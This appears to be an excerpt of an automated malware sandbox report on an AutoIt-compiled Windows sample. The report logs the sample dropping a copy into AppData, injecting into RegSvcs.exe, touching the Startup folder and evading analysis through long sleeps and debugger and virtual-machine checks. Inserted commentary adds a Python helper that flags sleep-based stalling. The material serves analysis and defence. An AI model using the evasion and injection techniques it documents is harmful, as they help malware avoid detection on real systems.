                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599672
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599562
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599344
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599234
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599125
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598891
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598765
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598656
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598438
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598313
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598072
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597952
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597815
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597483
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597375
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597266
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597047
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595936Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595266Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594840Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594297Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2101Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7720Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2557Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7288Jump to behavior
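The run of "Thread delayed" values above carries two distinct signals that are easy to miss when read line by line. First, 922337203685477 ms is TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks divided by 10000), i.e. a sleep with no practical end. Second, the values that start at 600000 (ten minutes) and shrink by roughly 110 ms per entry are what a loop that re-sleeps for "deadline minus now" looks like once the sandbox shortens or skips each sleep: the loop wakes early, recomputes the remaining time from the real clock and sleeps again. The script below is an added triage helper written for this page, not part of the Joe Sandbox report or its tooling. It parses "Thread delayed" evidence lines in either the fused layout of the extracted text or the "Source | description" layout used here, and reports both patterns per process. The sample lines are constructed from the values shown above.

```python
import re
from collections import defaultdict

# Constructed evidence lines using the delay values from the report above.
# The first line is in the fused layout of the raw extraction, the rest in
# the "Source: <process> | <description>" layout; the last line is a
# non-delay line that the parser must ignore.
SAMPLE_LINES = [
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599891",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599781",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599672",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599875",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599764",
    r"Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer",
]

# Matches both layouts: the process path is the first token ending in .exe,
# optionally followed by " | ", then the delay description.
DELAY_RE = re.compile(
    r"Source:\s*(?P<proc>\S+?\.exe)\s*\|?\s*Thread delayed: delay time: (?P<ms>\d+)"
)

# TimeSpan.MaxValue in milliseconds: Int64.MaxValue ticks / 10000 ticks per ms.
TIMESPAN_MAX_MS = 9223372036854775807 // 10000  # 922337203685477


def parse_delays(lines):
    """Map each process path to its delay values, in report order."""
    delays = defaultdict(list)
    for line in lines:
        m = DELAY_RE.search(line)
        if m:
            delays[m.group("proc")].append(int(m.group("ms")))
    return dict(delays)


def split_runs(values):
    """Split a sequence into runs; a new run starts whenever the value goes
    up again, which means the deadline was re-armed."""
    runs, current = [], []
    for v in values:
        if current and v > current[-1]:
            runs.append(current)
            current = []
        current.append(v)
    if current:
        runs.append(current)
    return runs


def is_countdown(values, max_step_ms=500):
    """True when every value is only slightly smaller than the previous one:
    the shape of a loop that re-sleeps for the time left on a fixed deadline
    while its sleeps are being shortened by the analysis environment."""
    if len(values) < 3:
        return False
    return all(0 < a - b <= max_step_ms for a, b in zip(values, values[1:]))


def triage(lines):
    """Per-process summary of sleep-based stalling."""
    summary = {}
    for proc, values in parse_delays(lines).items():
        finite = [v for v in values if v != TIMESPAN_MAX_MS]
        runs = split_runs(finite)
        summary[proc] = {
            "count": len(values),
            "infinite_sleep": TIMESPAN_MAX_MS in values,
            "max_finite_ms": max(finite, default=0),
            "countdown_runs": sum(1 for r in runs if is_countdown(r)),
        }
    return summary


if __name__ == "__main__":
    for proc, info in triage(SAMPLE_LINES).items():
        print(proc, info)
```

For the lines in this report the helper yields one process, an infinite-sleep sentinel, a 600000 ms ceiling and two countdown runs. A sandbox that merely fast-forwards Sleep without also advancing the clock source the loop compares against turns a single ten-minute sleep into hundreds of short ones, which is exactly the shape of the evidence here; a local sandbox with a patched or replaced timer source is the usual answer.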
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_0-104839)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | API coverage: 4.6 %
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | API coverage: 4.9 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | API coverage: 5.3 %
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F4445A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F4C6D1 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F4C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F4EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F4F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F4F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F43B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F4BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005F445A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005FC6D1 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00EE49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599655
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599544
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597201
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597072
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596482
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596375
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596266
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595483
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595375
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595266
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594544
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593860
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: ghauts.exe, 00000005.00000002.1924740574.0000000001A79000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwareworkstation.exeL.
Source: RegSvcs.exe, 00000002.00000002.4170806567.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
Source: 3i1gMM8K4z.exe, 00000000.00000003.1698854749.0000000001223000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwareworkstation.exec9G
Source: ghauts.exe, 00000001.00000003.1729833484.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmwareworkstation.exe
Source: RegSvcs.exe, 00000008.00000002.4170934819.000000000125D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F53F09 BlockInput
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00EE3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F15A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00EE4B37 LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_014411E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_01442868 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_014428C8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_01057448 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_01058B28 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_01058AC8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 5_2_01B88270 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 5_2_01B86BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 5_2_01B882D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F380A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F0A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F0A124 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005BA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005BA124 SetUnhandledExceptionFilter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_004123F1 SetUnhandledExceptionFilter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DEA008
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D39008
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F387B1 LogonUserW
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00EE3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00EE48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F44C7F mouse_event
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\3i1gMM8K4z.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Okeghem\ghauts.exe "C:\Users\user\AppData\Local\Okeghem\ghauts.exe"
Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Okeghem\ghauts.exe"
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F37CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00F37CAF
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exeCode function: 0_2_00F3874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00F3874B
                Source: 3i1gMM8K4z.exe, ghauts.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
